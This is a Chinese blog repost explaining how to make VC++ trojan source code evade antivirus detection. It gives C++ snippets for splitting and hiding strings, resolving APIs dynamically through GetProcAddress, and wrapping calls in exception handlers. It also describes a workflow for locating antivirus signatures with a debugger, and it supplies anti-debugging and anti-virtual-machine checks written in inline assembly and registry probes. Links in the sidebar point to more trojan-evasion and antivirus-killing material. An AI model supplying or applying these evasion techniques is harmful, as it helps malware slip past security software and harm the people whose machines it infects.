vc++木马源码免杀一些常用方法

最新推荐文章于 2021-05-18 01:05:19 发布
最新推荐文章于 2021-05-18 01:05:19 发布
阅读量671 收藏 1
点赞数
原文链接:http://www.cnblogs.com/-qing-/p/10809299.html
版权

1.字符串连接

//
//把字符串"canxin"连接起来(字符串连接法)

char *str1="can", *str2="xin",*str3=NULL;
str3=new char[strlen(str1)+strlen(str2)+1];
strcpy(str3,str1);//把str1所指由NULL结束的字符串复制到str3所指的数组中
strcat(str3,str2);//把str2所指字符串添加到str3结尾处(覆盖dest结尾处的'\0')并添加'\0'

//这样就实现了str3=str1+str2,把str1和str2连接起来了
//

2.字符串隐藏

char XXX[] = {'c','a','n','x','i','n','\0'};

 

3.动态调用

***************定义*******************
HANDLE
WINAPI
CreateToolhelp32Snapshot(
DWORD dwFlags,
DWORD th32ProcessID
);
***************列子*******************
typedef HANDLE (WINAPI *CreateToolhelp32SnapshotT)
(
DWORD dwFlags,
DWORD th32ProcessID
);
CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateToolhelp32Snapshot");

 

4.异常try catch


//列子//

UnhookWindowsHookEx(m_pTShared->hGetMsgHook);

 



//列子//

-------------------------生成后-------------------------

char canxin=1;
try
{
if(canxin=1)throw 31;
}
catch (...)
{
UnhookWindowsHookEx(m_pTShared->hGetMsgHook);
}

 


-------------------------生成后-------------------------

下面谈一下常见的问题 ,比如说BD  云本地,等等常见定位 错误 以及常见解决方法。比如说常见定位BD ,一次生成 ,查杀, 生成20块,查杀20块,大家有可能误解 定位错误 死循环。 其实非也,可以继续定位继续二次  。知道定位2大小,不杀为止,找到特征地址在OD里的位置,进行上下探查,有没有调用或者字符串的形式 ,然后再继续 搜索关键  在源码里的位置。进行分析特征 ,找到那句源代码 在上面进行加花 等处理 。还有一种可能性,无法定位到 真正的特征位置。 可以通过调试 。比如说 我个人常用的一句代码加在main函数头下,

 HKEY ck;
char strreg[] = {'S','O','F','T','W','A','R','E','\\','O','D','B','C','\0'};
if(ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)strreg,0,KEY_ALL_ACCESS,&ck))
{
  return 0;
}           ”

 




反调试:

   

 HKEY ck;
char strreg[] = {'S','O','F','T','W','A','R','E','\\','O','D','B','C','\0'};
if(ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)strreg,0,KEY_ALL_ACCESS,&ck))
{
  return 0;
}

bool IsVirtualPC()//反nod32查杀
{
__try
{
  __asm
  {
   mov eax, 1
    _emit 0x0F
    _emit 0x3F
    _emit 0x07
    _emit 0x0B
    _emit 0xC7
    _emit 0x45
    _emit 0xFC
    _emit 0xFF
    _emit 0xFF
    _emit 0xFF
    _emit 0xFF
  }
}
__except(1)
{
  return FALSE;
}
return TRUE;
}



if(IsVirtualPC())
{
  return 0;
}

_asm push esi;
_asm mov esi,46;
_asm inc esi;
_asm mov eax,dword ptr fs:[esi+1];
_asm mov eax,dword ptr ds:[eax+24];
_asm mov eax,dword ptr ds:[eax+12];
_asm cmp eax,2;
_asm pop esi;
_asm je Begin;
_asm lock dec ebx;
Begin:

HKEY dd;
char sof1[]={'S','O','F','T','W','A','R','E','\\','C','l','a','s','s','e','s','\\','.','3','8','6','\\','\0'};
if (ERROR_SUCCESS!=RegOpenKeyEx(HKEY_LOCAL_MACHINE,sof1,0,KEY_ALL_ACCESS,&dd))
{
  __asm nop;
  __asm nop;
  return -1;
}

 

转载于:https://www.cnblogs.com/-qing-/p/10809299.html

weixin_30877755
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c++“病毒”大全(6种)
weixin_66423343的博客
06-02 559
注:本文仅供搞笑,禁止用于非法。不要让别人的电脑快快乐乐
VC++结束进程,干掉杀毒软件或者其他令人不爽的进程
尹成的技术博客
03-29 4561
void pslist(void){HANDLE hProcessSnap = NULL;PROCESSENTRY32 pe32= {0};hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hProcessSnap == (HANDLE)-1){printf("/nCreateToolhelp32Snapshot(
VC免杀技巧 凉生提供
05-17
VC免杀技巧 凉生提供 txt内容纯自己收集不喜勿喷谢谢大家支持
首创!用户级权限进程防杀 C++
Hnnnbhnnnb的博客
08-11 1156
用户级权限实现简单防杀 用户级权限实现简单防杀 无意中翻出小学时候写的程序,拿出来分享下。这个程序运行不需要任何权限,应该是为数不多的能抗住PChunter强制结束的用户级程序(除了双进程)。程序只有一个主程序,主程序通常情况下杀不掉,被保护的程序只要不在运行则创建一个进程。写的比较仓促还有很多不足,分享一下思路而已,利用获取进程句柄和结束进程之间的时差“更换”自己的pid和句柄来让对方只能找到上...
c语言免杀程序源码,Window下基于C/C++源码免杀理论及思路(新手篇)
weixin_30427953的博客
05-18 838
作者:冷锋(LengF)[BHST]博客:www.81sec.com时间:2011-5-220x00概述最近搞一个国外的网站,对方是用的赛门铁克的诺顿杀毒软件,而内网又只对外开放了80端口,于是就想着传个端口转发或者端口复用的工具上去,可是一上传就没了。既然已经提权了,又不想轻易放弃这台服务器。于是就想着怎么办了。自己对非源码免杀不熟悉,于是就想到自己手头有类似于LCX的工具c源...
ReceiveMail_VC++源码_
10-01
标题 "ReceiveMail_VC++源码_" 暗示我们正在讨论一个使用Visual C++(VC++)6.0编写的程序,该程序的功能是接收电子邮件。这个程序可能是一个示例,用于教学或学习如何在C++环境中实现邮件接收功能。在编程领域,这...
源码免杀-花指令
08-21
源码免杀-花指令】这一主题涉及的是在编程领域中如何通过特定技术来避免恶意软件检测,尤其是针对Delphi编写的程序。免杀(Anti-Virus Evasion)是黑客和安全研究人员关注的一个重要领域,它涉及到如何让恶意代码...
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
基于变形方法的网页木马免杀相关技术分析.pdf
04-07
也出现了一些问题,严重威胁到互联网用户的隐私安全,木马导致的网络不安全性已经引起了社会各界的普遍关注,尤其是网络木马带来的盗号、流氓软件、拒服务供给等黑客行为给人们的工作和生活带来了较大的安全隐患,...
ASP木马免杀方法 比较全
12-16
ASP木马免杀方法 比较全的资料。通俗易懂
源码免杀辅助v4.0.exe
04-22
源码免杀辅助v4.0.exe
源码免杀之(完美解决中文编码和转意字符问题)隐藏字串常量辅助工具(MFC现实)
08-31
(自己实现的)MFC实现的隐藏字串常量辅助工具,对源码免杀非常有用,已经完美解决中文编码问题和转意字符问题,下载后评论要求源代码,就给你发送源代码,楼主会一个月查一次。
C++代码免杀之函数的动态调用
07-15
C++代码免杀之函数的动态调用 最近也在学着修改Gh0st远控的源代码,源代码免杀起来还是方便、简单、有效和简单点。针对于输入输出表盯的比较紧的杀毒软件,最有效的还是进行函数动态调用。也就是说找到函数的原定义,包括值类型和参数等等,再在调用该函数的地方重新定义这个函数,其实也只是改下函数名而已,下面举个例子:
C/C++ 实现切片免杀的思路
热门推荐
CSDN
10-20 1万+
今天突然想到了一个好玩的免杀思路,原理就是想办法切断磁盘特征与内存特征,关于沙盒免杀我寻思着,这样可以将不同的的DLL映射到内存,在内存中他们的特征也是被切断的,在注入器上做判断如果是沙盒则不加载,不是则分别注入三个甚至是更多的DLL,将我们的ShellCode切片力度更细,分配到几百个甚至上千个DLL上面,做成一个链,应该可以,没尝试过,抽空可以试试。 如果我们把粒度变得细致,捕捉特征也会变...
gh0st3.6源码编译+++免杀教程
qingruo_yin的专栏
05-06 4500
<br />这里有4个教程    可以去看看 <br /><br />gh0st3.6编译教程<br /><br />http://www.3800hk.com/donghua/f/24166.html<br /><br /><br /><br />vc++6.0对gh0st驱动免杀教程.rar<br />http://www.heibai.net/download/Soft/Soft_13829.htm<br /><br /><br /><br /><br /><br /><br />gh0st源代码修改
win2k下隐藏进程
超然楼
08-18 2005
win2k下隐藏进程 【关键词】:win2k下隐藏进程  录入:曾进 来源:huiyun.net 时间:2004-2-20 18:44:42 点击:62次 WINDOWS操作系统下,当我们无法结束或者不知道怎样结束一个程序的时候,或者是懒得去找“退出”按钮的时候,通常会按“CTRL+ALT+DEL”呼出
C语言实现防杀进程
cjz2005的博客
03-19 1061
程序原理很简单:弄俩进程,互相检测对方有没有被杀,被杀就再调一个,实现防杀效果。 原来我用了两个程序,但比较麻烦,就合并了,但是没有实现就自己运行的效果,只能自我复制一份。 可以把文件名改一下,但是要全部都改掉,包括最后的 ...
kali木马免杀火绒
最新发布
10-07
3. 使用免杀工具:kali系统中有一些专门用于木马免杀的工具,您可以尝试使用这些工具来生成免杀木马程序。例如,您可以使用powerstager等工具来生成免杀木马,然后再进行火绒的测试。 总之,木马免杀是一个不断...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值